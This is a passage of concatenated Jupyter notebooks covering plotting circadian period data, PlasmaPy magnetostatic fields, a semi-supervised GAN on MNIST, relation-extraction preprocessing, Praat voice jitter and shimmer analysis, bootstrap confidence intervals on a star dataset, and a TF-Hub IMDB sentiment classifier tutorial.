sheet_name='RAE_plots_20.03.15', skiprows=2, header=None, usecols=[1, 2, 3], names=['condition', 'period', 'gof'] ) exp2_period['condition'] = exp2_period.condition.str.split(':', expand=True)[0].map( {'VIR': 'VIRc', 'vir1': 'vir-1', 'Wild Type': 'WT'}) exp2_period.head() fig, ax = plt.subplots(figsize=(5.5, 5)) sns.boxplot( x='condition', y='period', color='#eeeeee', data=exp2_period, fliersize=0, order=['WT', 'VIRc', 'vir-1'], ax=ax ) sns.stripplot( x='condition', y='period', data=exp2_period, order=['WT', 'VIRc', 'vir-1'], ax=ax, ) ax.set_ylabel('Period Length (hours)') ax.set_xlabel('') ax.set_ylim(22, 28) plt.tight_layout() plt.savefig('vir1_VIRc_period_length_expt2.svg') plt.show() with pd.ExcelWriter('delayed_fluorescence_results.xlsx') as xlwrtr: exp1.to_excel(xlwrtr, sheet_name='experiment_1') exp2.to_excel(xlwrtr, sheet_name='experiment_2') exp1_period.to_excel(xlwrtr, sheet_name='experiment_1_period_length') exp2_period.to_excel(xlwrtr, sheet_name='experiment_2_period_length') ```
github_jupyter
``` %matplotlib inline ``` Magnetostatic Fields ===================== An example of using PlasmaPy's `Magnetostatic` class in `physics` subpackage. ``` from plasmapy.formulary import magnetostatics from plasmapy.plasma.sources import Plasma3D import numpy as np import astropy.units as u import matplotlib.pyplot as plt ``` Some common magnetostatic fields can be generated and added to a plasma object. A dipole ``` dipole = magnetostatics.MagneticDipole(np.array([0, 0, 1])*u.A*u.m*u.m, np.array([0, 0, 0])*u.m) print(dipole) ``` initialize a a plasma, where the magnetic field will be calculated on ``` plasma = Plasma3D(domain_x=np.linspace(-2, 2, 30) * u.m, domain_y=np.linspace(0, 0, 1) * u.m, domain_z=np.linspace(-2, 2, 20) * u.m) ``` add the dipole field to it ``` plasma.add_magnetostatic(dipole) X, Z = plasma.grid[0, :, 0, :], plasma.grid[2, :, 0, :] U = plasma.magnetic_field[0, :, 0, :].value.T # because grid uses 'ij' indexing W = plasma.magnetic_field[2, :, 0, :].value.T # because grid uses 'ij' indexing plt.figure() plt.axis('square') plt.xlim(-2, 2) plt.ylim(-2, 2) plt.title('Dipole field in x-z plane, generated by a dipole pointing in the z direction') plt.streamplot(plasma.x.value, plasma.z.value, U, W) ``` ``` cw = magnetostatics.CircularWire(np.array([0, 0, 1]), np.array([0, 0, 0])*u.m, 1*u.m, 1*u.A) print(cw) ``` initialize a a plasma, where the magnetic field will be calculated on ``` plasma = Plasma3D(domain_x=np.linspace(-2, 2, 30) * u.m, domain_y=np.linspace(0, 0, 1) * u.m, domain_z=np.linspace(-2, 2, 20) * u.m) ``` add the circular coil field to it ``` plasma.add_magnetostatic(cw) X, Z = plasma.grid[0, :, 0, :], plasma.grid[2, :, 0, :] U = plasma.magnetic_field[0, :, 0, :].value.T # because grid uses 'ij' indexing W = plasma.magnetic_field[2, :, 0, :].value.T # because grid uses 'ij' indexing plt.figure() plt.axis('square') plt.xlim(-2, 2) plt.ylim(-2, 2) plt.title('Circular coil field in x-z plane, generated by a circular coil in the x-y plane') plt.streamplot(plasma.x.value, plasma.z.value, U, W) ``` ``` gw_cw = cw.to_GeneralWire() # the calculated magnetic field is close print(gw_cw.magnetic_field([0, 0, 0]) - cw.magnetic_field([0, 0, 0])) ``` ``` iw = magnetostatics.InfiniteStraightWire(np.array([0, 1, 0]), np.array([0, 0, 0])*u.m, 1*u.A) print(iw) ``` initialize a a plasma, where the magnetic field will be calculated on ``` plasma = Plasma3D(domain_x=np.linspace(-2, 2, 30) * u.m, domain_y=np.linspace(0, 0, 1) * u.m, domain_z=np.linspace(-2, 2, 20) * u.m) # add the infinite straight wire field to it plasma.add_magnetostatic(iw) X, Z = plasma.grid[0, :, 0, :], plasma.grid[2, :, 0, :] U = plasma.magnetic_field[0, :, 0, :].value.T # because grid uses 'ij' indexing W = plasma.magnetic_field[2, :, 0, :].value.T # because grid uses 'ij' indexing plt.figure() plt.title('Dipole field in x-z plane, generated by a infinite straight wire ' 'pointing in the y direction') plt.axis('square') plt.xlim(-2, 2) plt.ylim(-2, 2) plt.streamplot(plasma.x.value, plasma.z.value, U, W) ```
github_jupyter
``` from keras.datasets import mnist from keras.layers import Input, Dense, Reshape, Flatten, Dropout, multiply, GaussianNoise from keras.layers import BatchNormalization, Activation, Embedding, ZeroPadding2D from keras.layers.advanced_activations import LeakyReLU from keras.layers.convolutional import UpSampling2D, Conv2D from keras.models import Sequential, Model from keras.optimizers import Adam from keras import losses from keras.utils import to_categorical import keras.backend as K from keras.utils import plot_model from keras.losses import categorical_crossentropy, mean_squared_error import matplotlib.pyplot as plt % matplotlib inline import numpy as np ``` ## hyper parameter ``` img_rows = 28 img_cols = 28 channels = 1 img_shape = (img_rows, img_cols, channels) num_labeled_images = 100 features_dim = 4096 num_classes = 10 noise_dim = 100 latent_dim = noise_dim batch_size=100 steps_per_epoch = (60000 - num_labeled_images) // batch_size epochs = 100 optimizer = Adam(0.001, 0.5) ``` ## build generator ``` # inputs input_noise = Input(shape=(latent_dim,)) # hidden layer g = Dense(128 * 7 * 7, activation="relu", input_dim=latent_dim)(input_noise) g = Reshape((7, 7, 128))(g) g = BatchNormalization(momentum=0.8)(g) g = UpSampling2D()(g) g = Conv2D(128, kernel_size=3, padding="same")(g) g = Activation("relu")(g) g = BatchNormalization(momentum=0.8)(g) g = UpSampling2D()(g) g = Conv2D(64, kernel_size=3, padding="same")(g) g = Activation("relu")(g) g = BatchNormalization(momentum=0.8)(g) g = Conv2D(1, kernel_size=3, padding="same")(g) # outputs g_image = Activation("tanh")(g) generator = Model(input_noise, g_image) ``` ## build discriminator ``` # inputs input_image = Input(shape=img_shape) d = Conv2D(32, kernel_size=3, strides=2, input_shape=img_shape, padding="same")(input_image) d = LeakyReLU(alpha=0.2)(d) d = Dropout(0.25)(d) d = Conv2D(64, kernel_size=3, strides=2, padding="same")(d) d = ZeroPadding2D(padding=((0,1),(0,1)))(d) d = LeakyReLU(alpha=0.2)(d) d = Dropout(0.25)(d) d = BatchNormalization(momentum=0.8)(d) d = Conv2D(128, kernel_size=3, strides=2, padding="same")(d) d = LeakyReLU(alpha=0.2)(d) d = Dropout(0.25)(d) d = BatchNormalization(momentum=0.8)(d) d = Conv2D(256, kernel_size=3, strides=1, padding="same")(d) d = LeakyReLU(alpha=0.2)(d) d = Dropout(0.25)(d) features = Flatten(name='features_output')(d) label = Dense(num_classes, name='y_output')(features) # there is no activation here discriminator = Model(input_image, [features, label]) ``` ## Combined model ``` discriminator.trainable = False validity = discriminator(g_image) combined = Model(input_noise, validity) ``` ## Loss function ``` ############## # Loss functions # ############## def softmax_cross_entropy(y_true, y_output): y_pred = K.softmax(y_output) loss =categorical_crossentropy(y_true, y_pred) return loss def discriminate_real(y_output, batch_size=batch_size): # logD(x) = logZ(x) - log(Z(x) + 1) where Z(x) = sum_{k=1}^K exp(l_k(x)) log_zx = K.logsumexp(y_output, axis=1) log_dx = log_zx - K.softplus(log_zx) dx = K.sum(K.exp(log_dx)) / batch_size loss = -K.sum(log_dx) / batch_size return loss, dx def discriminate_fake(y_output, batch_size=batch_size): # log{1 - D(x)} = log1 - log(Z(x) + 1) log_zx_g = K.logsumexp(y_output, axis=1) loss = K.sum(K.softplus(log_zx_g)) / batch_size return loss ################# # Discriminator Loss # ################# def labeled_loss(y_true, y_output): class_loss = softmax_cross_entropy(y_true, y_output) _,dx = discriminate_real(y_output, batch_size=batch_size) return class_loss def unlabeled_loss(g_label, y_output, batch_size=batch_size): loss_real,dx = discriminate_real(y_output, batch_size=batch_size) loss_fake = discriminate_fake(g_label, batch_size=batch_size) return loss_real + loss_fake ############### # Generator Loss # ############### def feature_matching(features_true, features_fake): return mean_squared_error(features_true, features_fake) def generator_loss(_, y_output): loss_real,dx = discriminate_real(y_output, batch_size=batch_size) return loss_real plot_model(discriminator, to_file='discriminator_model.png', show_shapes=True) plot_model(combined, to_file='combined_model.png', show_shapes=True) from keras.preprocessing.image import load_img # load_img('discriminator_model.png') # load_img('combined_model.png') ``` ## Prepare datasets ``` # Load the dataset (x_train, y_train), (x_test, y_test) = mnist.load_data() num_samples = 10 x_labeled = [] y_labeled = [] x_unlabeled = [] for class_index in range(10): label_index = np.where(y_train == class_index) class_input_data = x_train[label_index] # labeled data x_labeled.append(class_input_data[:num_samples]) y_labeled.append(np.full(num_samples, class_index, int)) # unlabeled data x_unlabeled.append(class_input_data[num_samples:]) x_labeled = np.concatenate(x_labeled, axis=0) x_unlabeled = np.concatenate(x_unlabeled, axis=0) x_labeled = x_labeled.astype('float32') / 255 x_unlabeled = x_unlabeled.astype('float32') / 255 x_labeled = x_labeled.reshape(x_labeled.shape+(1,)) x_unlabeled = x_unlabeled.reshape(x_unlabeled.shape+(1,)) y_labeled = np.concatenate(y_labeled, axis=0) y_labeled_onehot = np.eye(num_classes)[y_labeled] # test data x_test = x_test.astype('float32') / 255 x_test = x_test.reshape(x_test.shape+(1,)) y_test = np.eye(num_classes)[y_test] print('labeled input_shape: {}, {}\nunlabeled input_shape: {}'.format(x_labeled.shape, y_labeled_onehot.shape, x_unlabeled.shape)) print('test input_shape: ', x_test.shape, y_test.shape) # 教師なしの枚数が、教師ありと一致するようにリピート labeled_index = [] for i in range(len(x_unlabeled) // len(x_labeled)): l = np.arange(len(x_labeled)) np.random.shuffle(l) labeled_index.append(l) labeled_index = np.concatenate(labeled_index) unlabeled_index = np.arange(len(x_unlabeled)) print(labeled_index.shape, unlabeled_index.shape) dummy_features = np.zeros((batch_size, features_dim)) dummy_label = np.zeros((batch_size, num_classes)) history = [] for epoch in range(epochs): print('epoch {}/{}'.format(epoch+1, epochs)) np.random.shuffle(unlabeled_index) np.random.shuffle(labeled_index) for step in range(steps_per_epoch): print('step {}/{}'.format(step+1, steps_per_epoch)) unlabel_index_range = unlabeled_index[step*batch_size:(step+1)*batch_size] label_index_range = labeled_index[step*batch_size:(step+1)*batch_size] images_l = x_labeled[label_index_range] label_l = y_labeled_onehot[label_index_range] images_u = x_unlabeled[unlabel_index_range] # --------------------- # Train Discriminator # --------------------- ######### # for label ######### discriminator.compile( optimizer=optimizer, loss= labeled_loss, loss_weights={'features_output': 0., 'y_output': 1.}, metrics = {'y_output': 'accuracy'}) # Train the discriminator d_loss_label = discriminator.train_on_batch(images_l, [dummy_features, label_l]) print('label_loss: {}, label_acc: {}'.format(d_loss_label[0], d_loss_label[3])) ############ # for unlabeled ############ discriminator.compile( optimizer=optimizer, loss= unlabeled_loss, loss_weights={'features_output': 0., 'y_output': 1.}) z_batch = np.random.normal(0, 1, (batch_size, noise_dim)).astype(np.float32) _, g_label = combined.predict(z_batch) # Train the discriminator d_loss_unlabel = discriminator.train_on_batch(images_u, [dummy_features, g_label]) print('unlabel_loss : ', d_loss_unlabel[0]) # --------------------- # Train Generator # --------------------- combined.compile( optimizer=optimizer, loss= [feature_matching, generator_loss], loss_weights=[1, 1]) # Train the generator z_batch = np.random.normal(0, 1, (batch_size, noise_dim)).astype(np.float32) features_true, _ = discriminator.predict(images_l) g_loss = combined.train_on_batch(z_batch, [features_true, dummy_label]) # Plot the progress print ('g_loss', g_loss) # validation discriminator.compile( optimizer=optimizer, loss= labeled_loss, loss_weights={'features_output': 0., 'y_output': 1.}, metrics = {'y_output': 'accuracy'}) test_eval = discriminator.evaluate(x_test, [np.zeros((10000, features_dim)), y_test]) print('val_acc: ', test_eval[3]) history.append(test_eval) ```
github_jupyter
# More accurately concept blinding and removal of punctuation, normalizing digit, stop word removal, ner blinding For the Semeval 2010 dataset, this means replacing entity words by entity1 and entity2. For DDI dataset, this means replacing the two involved drug words and the other drug words. For the i2b2 dataset, this means replacing the words by their concept names. This blinding is entirely dataset dependent and by having the replacement information present in the metadata of the original csv file generated by the converters, the pre-processing module can be entirely separated. The data pre-processing code has multiple assumptions. First of all, metadata that is generated should not contain any overlaps between words within the same entity itself (for example if e1 word_index is stored as [(3,3),(3,4)] that is not allowed, but [(3,3),(4,4)] is allowed. Further, if there is overlap between e1 and e2, they have to have an exact overlap and not a partial overlap. For example e1's word_index [(1,1),(2,2)] and e2's word_index [(1,1), (3,3)] is allowed but [(1,1), (2,2)] and [(1,2)] is not allowed. ``` %load_ext autoreload %autoreload import os, pandas as pd, numpy as np import sys sys.path.append('../../../') from relation_extraction.data import utils import nltk from ast import literal_eval import itertools import spacy RESOURCE_PATH = "/data/medg/misc/geeticka/relation_extraction/semeval2010" indir = 'pre-processed/original/' outdir1 = 'pre-processed/entity_blinding/' outdir2 = 'pre-processed/punct_stop_digit/' outdir3 = 'pre-processed/punct_digit/' outdir4 = 'pre-processed/ner_blinding/' def res(path): return os.path.join(RESOURCE_PATH, path) from relation_extraction.data.converters.converter_semeval2010 import write_dataframe, read_dataframe,\ check_equality_of_written_and_read_df, write_into_txt # from relation_extraction.data.preprocess import replace_with_concept, replace_digit_punctuation_stop_word,\ # get_entity_positions_and_replacement_sentence from relation_extraction.data.preprocess import preprocess, replace_ner, get_entity_positions_and_replacement_sentence def makedir(outdir, res): if not os.path.exists(res(outdir)): os.makedirs(res(outdir)) # nlp = spacy.load('en_core_web_lg') ``` A good row to look at in drugbank data is 4123 df_train_drugbank.iloc[4123] ## Write the different preprocessed versions into csv files ``` # original_dataframe_names = ['train', 'test'] # makedir(outdir1, res) # makedir(outdir2, res) # makedir(outdir3, res) # makedir(outdir4, res) # for original_df_name in original_dataframe_names: # type1 = preprocess(read_dataframe, res(indir + original_df_name + '_original.csv')) # type2 = preprocess(read_dataframe, res(indir + original_df_name + '_original.csv'), 2) # type3 = preprocess(read_dataframe, res(indir + original_df_name + '_original.csv'), 3) # type4 = preprocess(read_dataframe, res(indir + original_df_name + '_original.csv'), nlp, 4) # write_dataframe(type1, res(outdir1 + original_df_name + '_entity_blinding.csv')) # write_dataframe(type2, res(outdir2 + original_df_name + '_punct_stop_digit.csv')) # write_dataframe(type3, res(outdir3 + original_df_name + '_punct_digit.csv')) # write_dataframe(type4, res(outdir4 + original_df_name + '_ner_blinding.csv')) ``` ## Write into text format ``` # for original_df_name in original_dataframe_names: # type1 = read_dataframe(res(outdir1 + original_df_name + '_entity_blinding.csv')) # type2 = read_dataframe(res(outdir2 + original_df_name + '_punct_stop_digit.csv')) # type3 = read_dataframe(res(outdir3 + original_df_name + '_punct_digit.csv')) # type4 = read_dataframe(res(outdir4 + original_df_name + '_ner_blinding.csv')) # write_into_txt(type1, res(outdir1 + original_df_name + '_entity_blinding.txt')) # write_into_txt(type2, res(outdir2 + original_df_name + '_punct_stop_digit.txt')) # write_into_txt(type3, res(outdir3 + original_df_name + '_punct_digit.txt')) # write_into_txt(type4, res(outdir4 + original_df_name + '_ner_blinding.txt')) ``` ## Check that the lengths of the files created is correct ``` def output_file_length(res, filename): return len(open(res(filename)).readlines()) print(output_file_length(res, indir + 'train_original.txt')) print(output_file_length(res, outdir1 + 'train_entity_blinding.txt')) print(output_file_length(res, outdir2 + 'train_punct_stop_digit.txt')) print(output_file_length(res, outdir3 + 'train_punct_digit.txt')) print(output_file_length(res, outdir4 + 'train_ner_blinding.txt')) print(output_file_length(res, indir + 'test_original.txt')) print(output_file_length(res, outdir1 + 'test_entity_blinding.txt')) print(output_file_length(res, outdir2 + 'test_punct_stop_digit.txt')) print(output_file_length(res, outdir3 + 'test_punct_digit.txt')) print(output_file_length(res, outdir4 + 'test_ner_blinding.txt')) ```
github_jupyter
``` #Measure pitch of all wav files in directory import glob import numpy as np import pandas as pd import parselmouth from parselmouth.praat import call from sklearn.decomposition import PCA from sklearn.preprocessing import StandardScaler # This is the function to measure voice pitch def measurePitch(voiceID, f0min, f0max, unit): sound = parselmouth.Sound(voiceID) # read the sound pitch = call(sound, "To Pitch", 0.0, f0min, f0max) #create a praat pitch object meanF0 = call(pitch, "Get mean", 0, 0, unit) # get mean pitch stdevF0 = call(pitch, "Get standard deviation", 0 ,0, unit) # get standard deviation harmonicity = call(sound, "To Harmonicity (cc)", 0.01, 75, 0.1, 1.0) hnr = call(harmonicity, "Get mean", 0, 0) pointProcess = call(sound, "To PointProcess (periodic, cc)", f0min, f0max) localJitter = call(pointProcess, "Get jitter (local)", 0, 0, 0.0001, 0.02, 1.3) localabsoluteJitter = call(pointProcess, "Get jitter (local, absolute)", 0, 0, 0.0001, 0.02, 1.3) rapJitter = call(pointProcess, "Get jitter (rap)", 0, 0, 0.0001, 0.02, 1.3) ppq5Jitter = call(pointProcess, "Get jitter (ppq5)", 0, 0, 0.0001, 0.02, 1.3) ddpJitter = call(pointProcess, "Get jitter (ddp)", 0, 0, 0.0001, 0.02, 1.3) localShimmer = call([sound, pointProcess], "Get shimmer (local)", 0, 0, 0.0001, 0.02, 1.3, 1.6) localdbShimmer = call([sound, pointProcess], "Get shimmer (local_dB)", 0, 0, 0.0001, 0.02, 1.3, 1.6) apq3Shimmer = call([sound, pointProcess], "Get shimmer (apq3)", 0, 0, 0.0001, 0.02, 1.3, 1.6) aqpq5Shimmer = call([sound, pointProcess], "Get shimmer (apq5)", 0, 0, 0.0001, 0.02, 1.3, 1.6) apq11Shimmer = call([sound, pointProcess], "Get shimmer (apq11)", 0, 0, 0.0001, 0.02, 1.3, 1.6) ddaShimmer = call([sound, pointProcess], "Get shimmer (dda)", 0, 0, 0.0001, 0.02, 1.3, 1.6) return meanF0, stdevF0, hnr, localJitter, localabsoluteJitter, rapJitter, ppq5Jitter, ddpJitter, localShimmer, localdbShimmer, apq3Shimmer, aqpq5Shimmer, apq11Shimmer, ddaShimmer def runPCA(df): #Z-score the Jitter and Shimmer measurements features = ['localJitter', 'localabsoluteJitter', 'rapJitter', 'ppq5Jitter', 'ddpJitter', 'localShimmer', 'localdbShimmer', 'apq3Shimmer', 'apq5Shimmer', 'apq11Shimmer', 'ddaShimmer'] # Separating out the features x = df.loc[:, features].values # Separating out the target #y = df.loc[:,['target']].values # Standardizing the features x = StandardScaler().fit_transform(x) #PCA pca = PCA(n_components=2) principalComponents = pca.fit_transform(x) principalDf = pd.DataFrame(data = principalComponents, columns = ['JitterPCA', 'ShimmerPCA']) principalDf return principalDf # create lists to put the results file_list = [] mean_F0_list = [] sd_F0_list = [] hnr_list = [] localJitter_list = [] localabsoluteJitter_list = [] rapJitter_list = [] ppq5Jitter_list = [] ddpJitter_list = [] localShimmer_list = [] localdbShimmer_list = [] apq3Shimmer_list = [] aqpq5Shimmer_list = [] apq11Shimmer_list = [] ddaShimmer_list = [] # Go through all the wave files in the folder and measure pitch for wave_file in glob.glob("audio/*.wav"): sound = parselmouth.Sound(wave_file) (meanF0, stdevF0, hnr, localJitter, localabsoluteJitter, rapJitter, ppq5Jitter, ddpJitter, localShimmer, localdbShimmer, apq3Shimmer, aqpq5Shimmer, apq11Shimmer, ddaShimmer) = measurePitch(sound, 75, 500, "Hertz") file_list.append(wave_file) # make an ID list mean_F0_list.append(meanF0) # make a mean F0 list sd_F0_list.append(stdevF0) # make a sd F0 list hnr_list.append(hnr) localJitter_list.append(localJitter) localabsoluteJitter_list.append(localabsoluteJitter) rapJitter_list.append(rapJitter) ppq5Jitter_list.append(ppq5Jitter) ddpJitter_list.append(ddpJitter) localShimmer_list.append(localShimmer) localdbShimmer_list.append(localdbShimmer) apq3Shimmer_list.append(apq3Shimmer) aqpq5Shimmer_list.append(aqpq5Shimmer) apq11Shimmer_list.append(apq11Shimmer) ddaShimmer_list.append(ddaShimmer) df = pd.DataFrame(np.column_stack([file_list, mean_F0_list, sd_F0_list, hnr_list, localJitter_list, localabsoluteJitter_list, rapJitter_list, ppq5Jitter_list, ddpJitter_list, localShimmer_list, localdbShimmer_list, apq3Shimmer_list, aqpq5Shimmer_list, apq11Shimmer_list, ddaShimmer_list]), columns=['voiceID', 'meanF0Hz', 'stdevF0Hz', 'HNR', 'localJitter', 'localabsoluteJitter', 'rapJitter', 'ppq5Jitter', 'ddpJitter', 'localShimmer', 'localdbShimmer', 'apq3Shimmer', 'apq5Shimmer', 'apq11Shimmer', 'ddaShimmer']) #add these lists to pandas in the right order pcaData = runPCA(df) df = pd.concat([df, pcaData], axis=1) # Write out the updated dataframe df.to_csv("processed_results.csv", index=False) df ```
github_jupyter
# Home Work Assignment 3: Bootstrap ``` import numpy as np import pandas as pd df = pd.read_csv('star_dataset.csv') df.head() ``` Best partition from previous work is determined by the following parameters. ``` n_cluster = 4 random_state = 9 from sklearn.cluster import KMeans from sklearn.preprocessing import StandardScaler quantitative_columns = ['Temperature (K)', 'Luminosity(L/Lo)', 'Radius(R/Ro)', 'Absolute magnitude(Mv)'] X = df[quantitative_columns] X = StandardScaler().fit_transform(X) kmeans = KMeans(n_clusters=n_cluster, n_init=1, max_iter=500, init='random', tol=1e-4, algorithm='full', random_state=random_state) kmeans.fit(X) df['cluster_id'] = kmeans.labels_ df.head(10) ``` ### 1. Take a feature, find the 95% confidence interval for its grand mean by using bootstrap ``` def bootstrap(data, K): data = np.asarray(data) N = len(data) means = [] for _ in range(K): idxs = np.random.choice(N, N, replace=True) mean = data[idxs].mean() means.append(mean) return np.asarray(means) def confidence_interval(means, pivotal=True): if pivotal is True: left = means.mean() - 1.96 * means.std() right = means.mean() + 1.96 * means.std() else: left = np.percentile(means, 2.5) right = np.percentile(means, 97.5) return sorted([abs(left), abs(right)]) print('mean: {:.2f}'.format(df['Temperature (K)'].mean())) print('no-pivotal: [{:.2f}, {:.2f}]'.format(*confidence_interval(bootstrap(df['Temperature (K)'], 1000), pivotal=False))) print('pivotal: [{:.2f}, {:.2f}]'.format(*confidence_interval(bootstrap(df['Temperature (K)'], 1000), pivotal=True))) ``` ### 2. Compare the within-cluster means for one of the features between two clusters using bootstrap ``` cluster_0 = df[df['cluster_id'] == 0] cluster_1 = df[df['cluster_id'] == 1] data = bootstrap(cluster_0['Temperature (K)'], 1000) - bootstrap(cluster_1['Temperature (K)'], 1000) print('no-pivotal: [{:.2f}, {:.2f}]'.format(*confidence_interval(data, pivotal=False))) print('pivotal: [{:.2f}, {:.2f}]'.format(*confidence_interval(data, pivotal=True))) ``` ### 3. Take a cluster, and compare the grand mean with the within- cluster mean for the feature by using bootstrap ``` cluster_0 = df cluster_1 = df[df['cluster_id'] == 1] data = bootstrap(cluster_0['Temperature (K)'], 1000) - bootstrap(cluster_1['Temperature (K)'], 1000) print('no-pivotal: [{:.2f}, {:.2f}]'.format(*confidence_interval(data, pivotal=False))) print('pivotal: [{:.2f}, {:.2f}]'.format(*confidence_interval(data, pivotal=True))) ```
github_jupyter
##### Copyright 2018 The TensorFlow Hub Authors. Licensed under the Apache License, Version 2.0 (the "License"); ``` # Copyright 2018 The TensorFlow Hub Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== ``` # How to build a simple text classifier with TF-Hub > Note: This tutorial uses **deprecated** TensorFlow 1 functionality. For a modern approach to this task, see the [TensorFlow 2 version](https://www.tensorflow.org/hub/tutorials/tf2_text_classification). <table class="tfo-notebook-buttons" align="left"> <td> <a target="_blank" href="https://colab.research.google.com/github/tensorflow/hub/blob/master/docs/tutorials/text_classification_with_tf_hub.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" />Run in Google Colab</a> </td> <td> <a target="_blank" href="https://github.com/tensorflow/hub/blob/master/docs/tutorials/text_classification_with_tf_hub.ipynb"><img src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" />View source on GitHub</a> </td> <td> <a href="https://tfhub.dev/google/nnlm-en-dim128/1"><img src="https://www.tensorflow.org/images/hub_logo_32px.png" />See TF Hub model</a> </td> </table> TF-Hub is a platform to share machine learning expertise packaged in reusable resources, notably pre-trained **modules**. This tutorial is organized into two main parts. **Introduction:** Training a text classifier with TF-Hub We will use a TF-Hub text embedding module to train a simple sentiment classifier with a reasonable baseline accuracy. We will then analyze the predictions to make sure our model is reasonable and propose improvements to increase the accuracy. **Advanced:** Transfer learning analysis In this section, we will use various TF-Hub modules to compare their effect on the accuracy of the estimator and demonstrate advantages and pitfalls of transfer learning. ## Optional prerequisites * Basic understanding of Tensorflow [premade estimator framework](https://www.tensorflow.org/tutorials/estimator/premade). * Familiarity with [Pandas](https://pandas.pydata.org/) library. ## Setup ``` # Install TF-Hub. !pip install seaborn ``` More detailed information about installing Tensorflow can be found at [https://www.tensorflow.org/install/](https://www.tensorflow.org/install/). ``` from absl import logging import tensorflow as tf import tensorflow_hub as hub import matplotlib.pyplot as plt import numpy as np import os import pandas as pd import re import seaborn as sns ``` # Getting started ## Data We will try to solve the [Large Movie Review Dataset v1.0](http://ai.stanford.edu/~amaas/data/sentiment/) task [(Mass et al., 2011)](http://ai.stanford.edu/~amaas/papers/wvSent_acl2011.pdf). The dataset consists of IMDB movie reviews labeled by positivity from 1 to 10. The task is to label the reviews as **negative** or **positive**. ``` # Load all files from a directory in a DataFrame. def load_directory_data(directory): data = {} data["sentence"] = [] data["sentiment"] = [] for file_path in os.listdir(directory): with tf.io.gfile.GFile(os.path.join(directory, file_path), "r") as f: data["sentence"].append(f.read()) data["sentiment"].append(re.match("\d+_(\d+)\.txt", file_path).group(1)) return pd.DataFrame.from_dict(data) # Merge positive and negative examples, add a polarity column and shuffle. def load_dataset(directory): pos_df = load_directory_data(os.path.join(directory, "pos")) neg_df = load_directory_data(os.path.join(directory, "neg")) pos_df["polarity"] = 1 neg_df["polarity"] = 0 return pd.concat([pos_df, neg_df]).sample(frac=1).reset_index(drop=True) # Download and process the dataset files. def download_and_load_datasets(force_download=False): dataset = tf.keras.utils.get_file( fname="aclImdb.tar.gz", origin="http://ai.stanford.edu/~amaas/data/sentiment/aclImdb_v1.tar.gz", extract=True) train_df = load_dataset(os.path.join(os.path.dirname(dataset), "aclImdb", "train")) test_df = load_dataset(os.path.join(os.path.dirname(dataset), "aclImdb", "test")) return train_df, test_df # Reduce logging output. logging.set_verbosity(logging.ERROR) train_df, test_df = download_and_load_datasets() train_df.head() ``` ## Model ### Input functions [Estimator framework](https://www.tensorflow.org/tutorials/estimator/premade) provides [input functions](https://www.tensorflow.org/api_docs/python/tf/compat/v1/estimator/inputs/pandas_input_fn) that wrap Pandas dataframes. ``` # Training input on the whole training set with no limit on training epochs. train_input_fn = tf.compat.v1.estimator.inputs.pandas_input_fn( train_df, train_df["polarity"], num_epochs=None, shuffle=True) # Prediction on the whole training set. predict_train_input_fn = tf.compat.v1.estimator.inputs.pandas_input_fn( train_df, train_df["polarity"], shuffle=False) # Prediction on the test set. predict_test_input_fn = tf.compat.v1.estimator.inputs.pandas_input_fn( test_df, test_df["polarity"], shuffle=False) ``` ### Feature columns TF-Hub provides a [feature column](https://www.tensorflow.org/hub/api_docs/python/hub/text_embedding_column.md) that applies a module on the given text feature and passes further the outputs of the module. In this tutorial we will be using the [nnlm-en-dim128 module](https://tfhub.dev/google/nnlm-en-dim128/1). For the purpose of this tutorial, the most important facts are: * The module takes **a batch of sentences in a 1-D tensor of strings** as input. * The module is responsible for **preprocessing of sentences** (e.g. removal of punctuation and splitting on spaces). * The module works with any input (e.g. **nnlm-en-dim128** hashes words not present in vocabulary into ~20.000 buckets). ``` embedded_text_feature_column = hub.text_embedding_column( key="sentence", module_spec="https://tfhub.dev/google/nnlm-en-dim128/1") ``` ### Estimator For classification we can use a [DNN Classifier](https://www.tensorflow.org/api_docs/python/tf/estimator/DNNClassifier) (note further remarks about different modelling of the label function at the end of the tutorial). ``` estimator = tf.estimator.DNNClassifier( hidden_units=[500, 100], feature_columns=[embedded_text_feature_column], n_classes=2, optimizer=tf.keras.optimizers.Adagrad(lr=0.003)) ``` ### Training Train the estimator for a reasonable amount of steps. ``` # Training for 5,000 steps means 640,000 training examples with the default # batch size. This is roughly equivalent to 25 epochs since the training dataset # contains 25,000 examples. estimator.train(input_fn=train_input_fn, steps=5000); ``` # Prediction Run predictions for both training and test set. ``` train_eval_result = estimator.evaluate(input_fn=predict_train_input_fn) test_eval_result = estimator.evaluate(input_fn=predict_test_input_fn) print("Training set accuracy: {accuracy}".format(**train_eval_result)) print("Test set accuracy: {accuracy}".format(**test_eval_result)) ``` ## Confusion matrix We can visually check the confusion matrix to understand the distribution of misclassifications. ``` def get_predictions(estimator, input_fn): return [x["class_ids"][0] for x in estimator.predict(input_fn=input_fn)] LABELS = [ "negative", "positive" ] # Create a confusion matrix on training data. cm = tf.math.confusion_matrix(train_df["polarity"], get_predictions(estimator, predict_train_input_fn)) # Normalize the confusion matrix so that each row sums to 1. cm = tf.cast(cm, dtype=tf.float32) cm = cm / tf.math.reduce_sum(cm, axis=1)[:, np.newaxis] sns.heatmap(cm, annot=True, xticklabels=LABELS, yticklabels=LABELS); plt.xlabel("Predicted"); plt.ylabel("True"); ``` # Further improvements 1. **Regression on sentiment**: we used a classifier to assign each example into a polarity class. But we actually have another categorical feature at our disposal - sentiment. Here classes actually represent a scale and the underlying value (positive/negative) could be well mapped into a continuous range. We could make use of this property by computing a regression ([DNN Regressor](https://www.tensorflow.org/api_docs/python/tf/contrib/learn/DNNRegressor)) instead of a classification ([DNN Classifier](https://www.tensorflow.org/api_docs/python/tf/contrib/learn/DNNClassifier)). 2. **Larger module**: for the purposes of this tutorial we used a small module to restrict the memory use. There are modules with larger vocabularies and larger embedding space that could give additional accuracy points. 3. **Parameter tuning**: we can improve the accuracy by tuning the meta-parameters like the learning rate or the number of steps, especially if we use a different module. A validation set is very important if we want to get any reasonable results, because it is very easy to set-up a model that learns to predict the training data without generalizing well to the test set. 4. **More complex model**: we used a module that computes a sentence 